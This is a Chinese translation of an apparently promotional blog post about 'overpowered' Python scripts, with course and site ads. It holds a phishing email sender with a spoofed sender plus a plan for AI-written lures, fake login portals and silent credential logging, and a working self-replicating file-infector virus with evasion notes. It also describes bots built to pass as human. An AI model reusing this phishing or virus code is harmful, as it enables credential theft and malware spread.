💡現存最瘋狂、最荒謬的 Python 腳本——以及它們為何令人恐懼。
讓我們明確一點:Python 不僅僅是初學者教程和無害資料腳本的語言。
這是現代的魔法書。
有些人寫的咒語非常強大,甚至可能破壞了現實規則。
我們正在談論可以超越人類、滲透到機器並自我重寫的Python 腳本。這些腳本不僅令人印象深刻,而且具有潛在的危險。
但不要把目光移開。這並不是為了嚇唬你。這是為了讓你做好準備。因為無論您是開發人員、技術愛好者,還是想要在程式碼執行的世界中保持領先一步的人,您都需要知道什麼是可能的。
如果你是 Python 開發人員呢?將此書籤作為參考。
👉 Python 開發者資源 - 由 0x3d.site 製作
為 Python 開發人員精心策劃的中心,提供必備工具、文章和熱門討論。
從程式碼工具到尖端的人工智慧專案,這是您保持敏銳的日常指揮中心。
資訊:
根據 IBM 2023 年威脅情報報告,網路釣魚佔所有網路攻擊的41% 。人工智慧驅動的網路釣魚的興起使得未經訓練的目標的成功率超過 90%。
這個 Python 腳本將 AI 文字產生與電子郵件欺騙和 HTML 偽造結合在一起。
使用類似 GPT 的 API (或本機模型)來產生電子郵件內容。
模仿 Apple、PayPal 或 Microsoft 等公司的品牌和寫作風格。
使用Flask
或靜態 HTML 產生虛假登入入口網站。
使用具有 IP 輪換的 SMTP 庫發送電子郵件。
將憑證靜默記錄到資料庫或 CSV 中。
這是一個範例(僅供教育使用):
import smtplib
from email.mime.text import MIMEText
def send_phish_email(to_address, subject, body):
msg = MIMEText(body, 'html')
msg['Subject'] = subject
msg['From'] = '[email protected]'
msg['To'] = to_address
with smtplib.SMTP('smtp.sendgrid.net', 587) as server:
server.starttls()
server.login('apikey', 'YOUR_SENDGRID_API_KEY')
server.sendmail(msg['From'], [to_address], msg.as_string())
🧠 為了製作電子郵件正文,腳本可能會使用:
from openai import OpenAI
def generate_email(prompt):
return openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)['choices'][0]['message']['content']
警告:如果惡意使用這種腳本是極度違法的。只有道德駭客環境和意識培訓才應該託管此類程式碼。
這簡直就像是科幻電影裡的情節。
資訊:
MITRE 和卡巴斯基的研究人員已經證實在現實的 Linux 環境中發現了 Python 惡意軟體。最危險的形式是無檔案、隱藏在記憶體或合法腳本檔案中。
掃描目錄中的.py
檔。
檢查是否已感染。
如果不是,則將其有效負載附加到目標腳本中。
每個週期使用輕微的程式碼變更來避免簽名偵測。
一個非常基本的自我複製片段的範例:
virus_code = """# begin_virus
import os
print("You've been infected!")
# end_virus"""
def infect_files():
for file in os.listdir():
if file.endswith('.py') and 'infected' not in file:
with open(file, 'r') as f:
content = f.read()
if '# begin_virus' not in content:
with open(file, 'w') as f:
f.write(virus_code + '\n' + content)
infect_files()
真正的惡意軟體會對其進行加密,混淆函數名稱,並在系統重新啟動後繼續存在。它甚至可能使用pyinstaller
來建立獨立的.exe
檔。
使用不可變的部署容器。
使用 Tripwire 或 OSSEC 等工具監控檔案完整性。
不要執行未經驗證的.py
檔案 — 即使來自 GitHub。
📚 透過更新的實踐和真實案例保持安全:
🔗開發者資源 @ python.0x3d.site/dev-resources
--coNEAPjPI
這些機器人不僅聰明——而且令人不安地可信。
資訊:
2024 年,史丹佛大學的研究人員在一個模擬城鎮中對人工智慧代理進行了公開測試。超過 70% 的人類參與者未能檢測出哪些角色是機器人。
它們將使用者互動儲存在sqlite3
或redis
中以模擬記憶體。
使用pyautogui
和time.sleep
等函式庫來模擬打字行為。
它們會引入猶豫、俚語、諷刺,甚至拼字錯誤。
import time
import random
import openai
def simulate_typing(text):
for char in text:
print(char, end='', flush=True)
time.sleep(random.uniform(0.03, 0.15))
def chat_response(prompt):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)['choices'][0]['message']['content']
return response
while True:
user_input = input("You: ")
reply = chat_response(user_input)
simulate_typing("Bot: " + reply + "\n")
🎯 這些機器人已經在管理 subreddits、提供技術支援並融入 Discord 伺服器。不要以為您正在與某人在線聊天。
👀 好奇這些在野外是如何使用的?
👉 python.0x3d.site/trending-discussions 上的熱門討論
你給它一個任務,它就會為你寫整個 Python 腳本——端到端。
資訊:
GitHub Copilot 和
Tabby
、CodeGeeX
和Smol Developer
等開源替代品重新定義了生產力。一些開發人員報告說,使用自動化程式碼工具可以將原型設計速度提高 5 倍。
# config.yaml
task: "Create a FastAPI server that accepts a POST request and returns the square of the number sent."
language: python
framework: fastapi
此腳本讀取 YAML,形成 GPT 提示,產生程式碼,透過測試輸入進行驗證,然後部署。
🔧 使用的工具:
PyYAML
用於設定解析
openai
或ollama
用於本地模型
pytest
或自訂斷言用於驗證
這是樣板的未來。
🔗 在這裡探索快速啟動工具和生成器:
🛠 python.0x3d.site/trending-repositories 上的熱門儲存庫
所有這些腳本都有一個共同點:權力。
權力落入壞人手中?它會破壞事物。但權力掌握在正確的人手中?它起保護作用。
真正的要點並不是這些腳本很危險。它們是可以學習的。透過了解它們,您可以更好地建立更聰明的工具、保護用戶並無所畏懼地進行創新。
事情是這樣的。
程式碼不再只是我們寫的東西。這是我們生活在其中的東西。您使用的每一個應用程式、您填寫的每一張表格、您閱讀的每封電子郵件——都是由程式碼驅動的。
Python 可能很容易編寫。但其影響卻並不簡單。
所以要深入學習。研究什麼是可能的。成為那種不僅知道要建造什麼,而且知道要注意什麼的開發人員。
收藏此頁:
🔗 Python 開發者資源 - 由 0x3d.site 製作
掌握現代 Python 的大本營:重要的文章、工具與討論。
讓我們創造突破極限但保護人們的東西。
因為 Python 不僅僅是一種語言。這是一種力量。
👊 您準備好明智地使用它了嗎?
透過這些結構化、高價值的課程擴展您的知識:
🚀開發人員的網路安全生存工具包- 使用 Burp Suite、Nmap 和 OSINT 技術等實際策略和工具保護您的程式碼。
💰開發人員的被動收入指南—10 多種將您的編碼技能貨幣化並建立自動化收入流的方法。
🌐網路的工作原理:執行網路的技術-深入了解網路背後的協定、伺服器和基礎設施。
💻 API 程式設計:了解 API、協定、安全性和實作-使用基於維基百科的結構化學習來掌握 API 基礎知識。
🕵️技術人員的終極 OSINT 指南– 學習像專業人士一樣追蹤、分析和保護數位足跡。
🧠駭客和間諜如何使用相同的心理技巧來對付你——發現科技中說服、欺騙和操縱的陰暗面。
🔥更多小眾、高價值學習資源 →看全部
https://snappytuts.gumroad.com/l/shiyy
原文出處:https://dev.to/snappytuts/the-most-overpowered-python-scripts-ever-written-159f